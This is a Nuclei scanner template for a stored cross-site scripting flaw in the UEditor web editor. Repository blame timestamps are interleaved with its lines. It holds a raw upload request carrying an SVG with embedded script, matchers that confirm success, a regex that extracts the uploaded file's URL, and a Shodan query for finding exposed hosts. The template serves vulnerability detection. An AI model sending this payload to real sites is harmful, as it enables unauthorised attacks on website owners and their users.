2023-03-16 10:48:31 +00:00
id : ueditor-xss
info :
2023-03-17 10:22:40 +00:00
name : ueditor - Cross Site Scripting
2023-03-16 10:48:31 +00:00
author : pwnhxl
2023-03-17 10:22:40 +00:00
severity : high
description : |
2023-03-17 11:56:23 +00:00
The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks.
2023-03-16 10:48:31 +00:00
reference :
- https://blog.csdn.net/weixin_50464560/article/details/124803185
- https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
2023-03-17 10:22:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-03-17 10:22:40 +00:00
verified : "true"
shodan-query : title:"ueditor"
2023-03-16 10:48:31 +00:00
tags : ueditor,xss
variables :
randstring : "{{to_lower(rand_base(16))}}"
2023-04-27 04:28:59 +00:00
http :
2023-03-16 10:48:31 +00:00
- raw :
- |
2023-03-17 10:22:40 +00:00
POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
2023-03-16 10:48:31 +00:00
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition : form-data; name="upfile"; filename="test.xml"
Content-Type : application/vnd.ms-excel
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
2023-03-17 10:22:40 +00:00
alert(document.domain);
2023-03-16 10:48:31 +00:00
</script>
</svg>
------WebKitFormBoundary{{randstring}}--
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-03-17 10:22:40 +00:00
- 'state":"SUCCESS'
- '.xml","title'
2023-03-16 10:48:31 +00:00
condition : and
2023-03-17 10:22:40 +00:00
- type : word
part : header
words :
- "text/html"
2023-03-16 10:48:31 +00:00
- type : status
status :
2023-03-17 10:22:40 +00:00
- 200
extractors :
- type : regex
name : file_path
part : body
group : 1
regex :
- 'url":"(.*)","title'